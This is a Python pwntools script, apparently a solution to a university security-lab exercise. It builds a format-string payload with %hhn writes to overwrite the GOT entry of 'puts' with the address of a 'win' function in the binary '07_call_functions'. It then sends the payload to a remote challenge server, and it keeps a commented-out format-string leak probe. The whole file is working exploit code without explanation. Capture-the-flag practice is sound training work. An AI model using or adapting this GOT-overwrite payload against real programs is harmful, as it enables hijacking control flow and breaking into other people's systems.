43 lines
1.1 KiB
Python
43 lines
1.1 KiB
Python
from pwn import remote, process, p32, ELF
|
|
|
|
# Does not deal with \0s in any pointers needed
|
|
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
|
|
addrs: bytes = b""
|
|
writes: bytes = b""
|
|
cum_chars: int = 4 * len(data)
|
|
|
|
for offset in range(len(data)):
|
|
addr = base + offset
|
|
addrs += p32(addr)
|
|
arg_n = arg_base + offset
|
|
n = data[offset] - (cum_chars % 256)
|
|
if n < 8: n += 256
|
|
print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
|
|
write = f"%{n}x%{arg_n}$hhn"
|
|
print(write)
|
|
writes += write.encode('utf-8')
|
|
cum_chars += n
|
|
|
|
pl = addrs + writes
|
|
if b"\0" in pl: raise Exception("Payload requires a \\0")
|
|
return pl
|
|
|
|
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
|
PORT = 25197
|
|
|
|
conn = remote(HOST, PORT)
|
|
#conn = process("07_call_functions")
|
|
#input()
|
|
|
|
elf = ELF("07_call_functions")
|
|
got_puts = elf.got['puts']
|
|
win = elf.sym['win']
|
|
pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
|
|
print(f"Payload: ({len(pl)})", pl, "\n\n")
|
|
|
|
#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
|
|
|
|
conn.send(pl)
|
|
while conn.connected():
|
|
print(chr(conn.recv(1)[0]), end="", flush=True)
|